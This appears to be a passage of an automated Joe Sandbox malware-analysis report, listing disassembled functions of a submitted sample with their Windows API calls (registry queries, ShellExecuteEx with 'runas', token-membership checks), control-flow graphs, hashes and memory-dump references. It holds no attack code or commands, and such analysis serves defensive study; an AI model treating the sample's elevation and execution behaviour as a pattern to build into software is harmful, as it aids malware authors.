                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00406E10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                                                                                                                                                                                                                                  • String ID: )q@
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3660427363-2284170586
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004030DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                                                                                                                                                                                                                                                                                                                                  • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CommandHandleLineModule
                                                                                                                                                                                                                                                                                                                                                                  • String ID: U1hd.@
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2123368496-2904493091
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004094D8 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1458359878-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                                                                                                  Function 00423C1C Relevance: 21.4, APIs: 14, Instructions: 395COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 386 423c1c-423c50 387 423c52-423c53 386->387 388 423c84-423c9b call 423b78 386->388 389 423c55-423c71 call 40b44c 387->389 394 423cfc-423d01 388->394 395 423c9d 388->395 415 423c73-423c7b 389->415 416 423c80-423c82 389->416 396 423d03 394->396 397 423d37-423d3c 394->397 398 423ca3-423ca6 395->398 399 423d60-423d70 395->399 403 423fc1-423fc9 396->403 404 423d09-423d11 396->404 407 423d42-423d45 397->407 408 4240aa-4240b8 IsIconic 397->408 405 423cd5-423cd8 398->405 406 423ca8 398->406 401 423d72-423d77 399->401 402 423d7b-423d83 call 4241a4 399->402 417 423d88-423d90 call 4241ec 401->417 418 423d79-423d9c call 423b94 401->418 411 424162-42416a 402->411 403->411 412 423fcf-423fda call 4181f0 403->412 420 423f23-423f4a SendMessageA 404->420 421 423d17-423d1c 404->421 413 423db9-423dc0 405->413 414 423cde-423cdf 405->414 423 423e06-423e16 call 423b94 406->423 424 423cae-423cb1 406->424 409 4240e6-4240fb call 424860 407->409 410 423d4b-423d4c 407->410 408->411 422 4240be-4240c9 GetFocus 408->422 409->411 434 423d52-423d55 410->434 435 4240fd-424104 410->435 432 424181-424187 411->432 412->411 467 423fe0-423fef call 4181f0 IsWindowEnabled 412->467 413->411 427 423dc6-423dcd 413->427 428 423ce5-423ce8 414->428 429 423f4f-423f56 414->429 415->432 416->388 416->389 417->411 418->411 420->411 430 423d22-423d23 421->430 431 42405a-424065 421->431 422->411 439 4240cf-4240d8 call 41f004 422->439 423->411 440 423cb7-423cba 424->440 441 423e2e-423e4a PostMessageA call 423b94 424->441 427->411 446 423dd3-423dd9 427->446 447 423cee-423cf1 428->447 448 423e4f-423e6f call 423b94 428->448 429->411 455 423f5c-423f61 call 404e54 429->455 449 424082-42408d 430->449 450 423d29-423d2c 430->450 431->411 452 42406b-42407d 431->452 453 424130-424137 434->453 454 423d5b 434->454 443 424106-424119 call 4244e4 435->443 444 42411b-42412e call 42453c 435->444 439->411 498 4240de-4240e4 SetFocus 439->498 460 423cc0-423cc3 440->460 461 423eb5-423ebc 440->461 441->411 443->411 444->411 446->411 468 423cf7 447->468 469 423e1b-423e29 call 424188 447->469 509 423e93-423eb0 call 423a94 PostMessageA 448->509 510 423e71-423e8e call 423b24 PostMessageA 448->510 449->411 476 424093-4240a5 449->476 473 423d32 450->473 474 423f66-423f6e 450->474 452->411 471 42414a-424159 453->471 472 424139-424148 453->472 475 42415b-42415c call 423b94 454->475 455->411 462 423cc9-423cca 460->462 463 423dde-423dec IsIconic 460->463 464 423ebe-423ed1 call 423b24 461->464 465 423eef-423f00 call 423b94 461->465 482 423cd0 462->482 483 423da1-423da9 462->483 489 423dfa-423e01 call 423b94 463->489 490 423dee-423df5 call 423bd0 463->490 512 423ee3-423eea call 423b94 464->512 513 423ed3-423edd call 41ef68 464->513 517 423f02-423f10 call 41eeb4 465->517 518 423f16-423f1e call 423a94 465->518 467->411 514 423ff5-424004 call 4181f0 IsWindowVisible 467->514 468->475 469->411 471->411 472->411 473->475 474->411 496 423f74-423f7b 474->496 505 424161 475->505 476->411 482->475 483->411 499 423daf-423db4 call 422c5c 483->499 489->411 490->411 496->411 508 423f81-423f90 call 4181f0 IsWindowEnabled 496->508 498->411 499->411 505->411 508->411 536 423f96-423fac call 412320 508->536 509->411 510->411 512->411 513->512 514->411 537 42400a-424055 GetFocus call 4181f0 SetFocus call 415250 SetFocus 514->537 517->518 518->411 536->411 541 423fb2-423fbc 536->541 537->411 541->411
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4eca4a6cf5e19c7662df952a73cfa6caf2a73edca858b8c7353bb772d64ffdaf
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: adb1057a9d0d7329e5210459a6b6756db00cf693e958207d3a560887342e2c6b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4eca4a6cf5e19c7662df952a73cfa6caf2a73edca858b8c7353bb772d64ffdaf
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EBE1A230700125EFD704EF69E989A6EB7B5EF94304F9480A6E545AB352C73CEE81DB08
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00478420 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 94COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0047828C: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02122BDC,?,?,?,02122BDC,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782A5
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0047828C: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004782AB
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0047828C: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BDC,?,?,?,02122BDC,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782BE
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0047828C: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BDC,?,?,?,02122BDC), ref: 004782E8
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0047828C: GetFinalPathNameByHandleA.KERNELBASE(00000000,?,00001000,00000000,00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BDC), ref: 00478301
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0047828C: CloseHandle.KERNEL32(00000000,?,?,?,02122BDC,00478450,00000000,0047856E,?,?,-00000010,?), ref: 00478306
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00478364: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004783F6,?,?,?,02122BDC,?,00478458,00000000,0047856E,?,?,-00000010,?), ref: 00478394
                                                                                                                                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004784A8
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,0047856E,?,?,-00000010,?), ref: 004784B1
                                                                                                                                                                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004784FE
                                                                                                                                                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478522
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00478553,00000000,00000000,000000FF,000000FF,00000000,0047854C,?,00000000,0047856E,?,?,-00000010,?), ref: 00478546
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitFinalLastModuleMultipleNameObjectsPathProcProcessShellWait
                                                                                                                                                                                                                                                                                                                                                                  • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1110972819-221126205
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1599033f56c62a6cddf8aad5bf6ce217f3aa4a339ea025248c796bdaad3cfadd
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: be90243bdd9c3757315ff9bbcfcad83cd6a8df60a98d136a70e83fac94f3d3e4
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1599033f56c62a6cddf8aad5bf6ce217f3aa4a339ea025248c796bdaad3cfadd
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0314670A40609BEDB11EFAAD845ADEB6B8EF05314F50847FF518E7281DB7C89058B19
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00408570 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d3b8e551ebd18b966166ca098383beb9494d3946d3c482517005b7019d2e894c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EEE0D87170021467D711A95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE8046ED
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00423B94 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: NtdllProc_Window
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4255912815-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 48edabf631f81993959cac3a7e5f7459cd1392ebb1ce9be3f782214e3b303982
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48edabf631f81993959cac3a7e5f7459cd1392ebb1ce9be3f782214e3b303982
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0042E0AC Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 178memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0E6
                                                                                                                                                                                                                                                                                                                                                                  • GetVersion.KERNEL32(00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E103
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E11C
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E122
                                                                                                                                                                                                                                                                                                                                                                  • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E137
                                                                                                                                                                                                                                                                                                                                                                  • FreeSid.ADVAPI32(00000000,0042E297,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E28A
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                                                                                                                                                                                                                                                                                                  • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2252812187-1888249752
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4450c5f0f43cc16413f68c5de3a1580e1c492cb8cc182c6ab933424faa411036
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1c76bb1748f4203a7925b196b2d5623075850b54fd141b793a49aa5c8bf5bf77
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4450c5f0f43cc16413f68c5de3a1580e1c492cb8cc182c6ab933424faa411036
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22517571B44615EEEB10EAE6A842BBF7BACDB09304F9404BBB501F7282D57C9904867D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004834FC Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 68libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 365 4834fc-483521 GetModuleHandleA GetProcAddress 366 483588-48358d GetSystemInfo 365->366 367 483523-483539 GetNativeSystemInfo GetProcAddress 365->367 368 483592-48359b 366->368 367->368 369 48353b-483546 GetCurrentProcess 367->369 370 4835ab-4835b2 368->370 371 48359d-4835a1 368->371 369->368 378 483548-48354c 369->378 374 4835cd-4835d2 370->374 372 4835a3-4835a7 371->372 373 4835b4-4835bb 371->373 376 4835a9-4835c6 372->376 377 4835bd-4835c4 372->377 373->374 376->374 377->374 378->368 380 48354e-483555 call 452708 378->380 380->368 383 483557-483564 GetProcAddress 380->383 383->368 384 483566-48357d GetModuleHandleA GetProcAddress 383->384 384->368 385 48357f-483586 384->385 385->368
